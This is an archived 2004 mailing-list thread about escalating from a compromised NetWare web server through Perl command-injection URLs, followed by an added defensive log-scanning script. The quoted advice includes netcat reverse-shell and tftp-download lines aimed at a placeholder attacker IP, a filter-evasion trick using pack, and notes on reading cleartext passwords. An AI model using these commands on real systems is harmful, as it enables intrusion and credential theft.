Re: Escalating from Netware box

From: Francois Labreque (flabreq@ca.ibm.com)
Date: Mon Aug 23 2004 - 11:28:20 EDT


"Dave Nuull" <gotodevnull@hotmail.com> wrote on 2004-08-15 12:02:35:

> McKenna Henage or Beme Lee wrote:

> >I'm wrapping up a pen-test and I've gained access to a
> >NetWare-Enterprise-Web-Server/5.1 box through the ability to run Perl
> >commands using specially crafted URLs (e.g.,
> >"perl/-e%20system(%22dir%22);"). I wrote a program in Perl that crafts the
> >URLs to allow me to easily read any file on the server, write to any file,
> >or execute any command. However, without any Novell experience (I am an MS
> >and Linux guy), I am unable to escalate to the point of being able to attack
> >other systems on the client's network.

> Aside question: If perl -e is a command line option, why does a simple 'dir'
> not work? Or a cmd%20/C%20dir?

Because "dir" does not work on a Novell server. Nor does "CMD.EXE".
Novell servers run their own OS.

> >Any suggestions for ways I can use this Netware box to further exploit their
> >networks would be very much appreciated. In particular, I'm interested in
> >discovering what other devices are on their network (since I can only see
> >their Netware box from the Internet), performing port scans, vulnerability
> >scans, etc. I need to be nice to the server since it is in production, so
> >I'm trying not to experiment too much on their machine and risk bringing it
> >down (already crashed it once!).

> If you can execute on the remote server, and if there are any 'closed' ports
> (i.e. not filtered) then have you tried to tftp up a nc.exe and shovel a
> shell back to your attack host?
> i.e.
> "perl/-e%20system(%22tftp%20-i%20Your_IP%20get%20nc.exe%22);"
> "perl/-e%20system(%22nc.exe%20-e%20cmd.exe%20Your_IP%20Your_Port%22);"

You would have to send an .NLM - The Novell executable format - Win32 or
DOS .EXE formats do not run on Netware.

>
> If as you say below you can't find the tftp client, what about perl's FTP
> module:
> This one does not contain any " or ' chars so you could echo all the lines
> into a file on the remote server and run from the command line.

> use Net::FTP;
> $ftp=Net::FTP->new($ARGV[0]);
> $ftp->login($ARGV[1],$ARGV[2]);
> $ftp->binary();
> $ftp->get($ARGV[3]);
> $ftp->quit();

> >I've already done some research on Netware, including listening to RFP's
> >Black Hat talk on Netware, and reading the "Novell Hacking FAQ" available on
> >the web. Unfortunately most resources I've found refer to Netware 2.x, 3.x,
> >and 4.x. Here is what I've been able to gain so far, thanks to having
> >partial access to files on the system using directory traversal:

> If you have partial access to files (i.e. at least read access), could you
> not tftp complete files back to your attack host?

There is usually no TFTP client on a Netware server. He said he could
read the files in a browser.

> This again assumes they have not
> configured restrictive outbound filtering on their firewall. If you can
> find their internal mail server, you could craft some SMTP commands and
> mail them to yourself instead :-)

Assuming he can use the Perl command interface on the Netware server to
connect to the SMTP server.

> >-Internal IP address
> >-IPX servers (running the command “display ipx servers”)
> >-See unencrypted passwords in /system/autoexec.ncf and /etc/netinfo.cfg (and
> >to crack a password in /Novonyx/suitespot/admin-serv/config/ADMPW)
> >-Successfully ping out to a device on the Internet (unfortunately it appears
> >to be continuous, because I wasn’t able to stop it)
> >-…and pretty much anything else that is in a file, or almost any command
> >
> >I have run into some limits:
> >
> >-Any request I make (to read/write a file or execute a command) is limited
> >in character length, hampering my ability to execute an elaborate Perl
> >program on the box or even to read some files that are too far down the
> >directory tree

> If you have command length limits, perhaps try to create a .bat file on
> the remote server using echo appends and splitting the command into smaller
> sections.
> "perl/-e%20system(%22echo%20cd%20some_path%20>>mycmd.bat%22);"
> "perl/-e%20system(%22echo%20run_command%20>>mycmd.bat%22);"
> "perl/-e%20system(%22mycmd.bat%22);"

.BAT files do not work on Netware servers. He could create an .NCF which
is basically the same thing as a .BAT but is limited to the commands that
you can execute from the server prompt.

>
> >-Haven't found a way to send some characters such as " and ', even after
> >trying everything I could think of (encoding, double encoding, etc.). Wish I
> >could do that because then I could essentially start writing a new Perl
> >script to their machine and overcome the character limitation just
> >mentioned, and potentially find a way to upload a Perl port scanner of some
> >sort.

> If you have perl interpreter access, you could use the pack/unpack functions
> to decode the " or ' chars into decimal/hex/octal and using one liners
> unpack the chars on the remote host. ref: ascii chart for char->hex values
> i.e.
> C:\>perl -e $a=pack(H6,222027);print$a;
> " '

> >-An inability to correctly view all files. Since I'm getting the files fed
> >back in a web browser, I can sometimes only see the first parts of a file
> >(up to 500K or so), and have trouble downloading binaries.
> >
> >-An inability to see the entire results of a command run on the system. I
> >can run a command, but then to see the results I have to open
> >/etc/console.log and read the last few lines (so I can't always see the
> >entire results, because it appears to be cut off in the log).

> Do command output redirections into your own log file not work on the
> server?

Exactly. On a Netware server, if CONLOG.NLM is running, ALL command output
is duplicated in etc/console.log; if CONLOG.NLM is not running, the output
will only appear on the server's physical console. There is a way to change
the size of /etc/console.log at the command line, so you could unload CONLOG
and LOAD CONLOG with the proper parameter so that you get a couple of MBs of
logs.

> >-I don’t even know how to download files to the Netware box. I have been
> >unable to determine if it has an HTTP or FTP client I can use to pull down a
> >trojan/backdoor program, netcat, or anything else.
> >-Some blockage at the firewall (?). For example, I tried loading the remote
> >console and then accessing it remotely, but it appears to be blocked at the
> >firewall since I can’t get in. If it were a Linux/Unix/Windows box then I’d
> >know how to download an SSH client and reverse-tunnel a connection out
> >through the firewall, but I’m clueless on Netware.
> >
> >Thanks in advance for any suggestions you can provide in the next couple
> >days.
> >
> >Beme Lee

[Hotmail spam snipped.]

___________________________________________________
François Labrèque, CCNP
Technical Leader, Network Support
IBM Global Services
Tel.:(514)-964-2150 Fax.:(514)-964-1708
flabreq@ca.ibm.com

In the future, performance will be measured by the size of your pipe!
       - Dogbert, on networking
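From the defender's side, the thread describes three things a web server log should reveal: a request path that hands a command line to the Perl CGI ("perl/-e ..."), URL encoding or double encoding used to get quote characters past filtering, and a pack("H6", ...) call used to manufacture the " and ' characters the poster could not send directly. The following is an added example, not code from the thread, from Novell or from the list; it assumes Common Log Format access logs and uses constructed sample lines. It decodes each request path until it stops changing, flags perl/-e requests, and decodes any pack hex string so an analyst can see which characters the payload would have produced.

```python
import re
from urllib.parse import unquote

# Constructed sample access log in Common Log Format. These are invented
# lines for the example, not traffic from the engagement discussed above.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Aug/2004:12:02:35 -0400] "GET /perl/-e%20system(%22dir%22); HTTP/1.0" 200 512',
    '10.0.0.5 - - [15/Aug/2004:12:03:10 -0400] "GET /perl/-e%2520system(%2522dir%2522); HTTP/1.0" 200 512',
    '10.0.0.5 - - [15/Aug/2004:12:04:41 -0400] "GET /perl/-e%20$a=pack(H6,222027);print$a; HTTP/1.0" 200 3',
    '10.0.0.9 - - [15/Aug/2004:12:05:02 -0400] "GET /perl/report.pl?year=2004 HTTP/1.0" 200 2048',
    '10.0.0.9 - - [15/Aug/2004:12:05:30 -0400] "GET /index.html HTTP/1.0" 200 1320',
]

# client, ident, user, [timestamp], "METHOD path protocol", status
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# The Perl CGI being driven with a command line instead of a script name.
PERL_DASH_E = re.compile(r"perl/-e\b", re.IGNORECASE)
# Perl constructs that hand control to the server's command interpreter.
SHELL_OUT = re.compile(r"\b(system|exec|open)\s*\(", re.IGNORECASE)
# pack(H6,222027)-style calls that build characters from hex digits.
PACK_HEX = re.compile(r"""pack\s*\(\s*["']?H\d*["']?\s*,\s*["']?([0-9a-fA-F]+)["']?\s*\)""")


def fully_decode(s: str, rounds: int = 3) -> str:
    """URL-decode until the string stops changing, bounded to avoid loops."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def decode_pack_hex(hexdigits: str) -> str:
    """Turn the hex digits of a pack('Hn', ...) call back into characters."""
    if len(hexdigits) % 2:
        hexdigits += "0"  # pack pads an odd-length nibble string on the right
    return bytes.fromhex(hexdigits).decode("latin-1")


def analyse_request(path: str) -> dict:
    """Classify one raw request path; returns findings for the analyst."""
    decoded = fully_decode(path)
    suspicious = bool(PERL_DASH_E.search(decoded))
    findings, pack_strings = [], []
    if suspicious:
        if SHELL_OUT.search(decoded):
            findings.append("shell-out")
        for m in PACK_HEX.finditer(decoded):
            findings.append("pack-hex")
            pack_strings.append(decode_pack_hex(m.group(1)))
        # A second decoding round changed the string: double encoding was used.
        if decoded != unquote(path):
            findings.append("double-encoding")
    return {"path": path, "decoded": decoded, "suspicious": suspicious,
            "findings": findings, "pack_strings": pack_strings}


def scan_log(lines) -> list:
    """Return one alert dict per suspicious request, in log order."""
    alerts = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        client, when, method, path, status = m.groups()
        result = analyse_request(path)
        if result["suspicious"]:
            result.update(client=client, time=when, method=method, status=status)
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["time"], a["client"], a["findings"], a["pack_strings"], a["decoded"])
```

The bounded decode loop matters: matching on the raw path misses the %2522 form, while decoding once misses nothing here but would on a triple-encoded request. Decoding the pack hex string (222027 yields a double quote, a space and a single quote) shows why a filter that only rejects literal quote characters gives little assurance against this class of request.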




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:00 EDT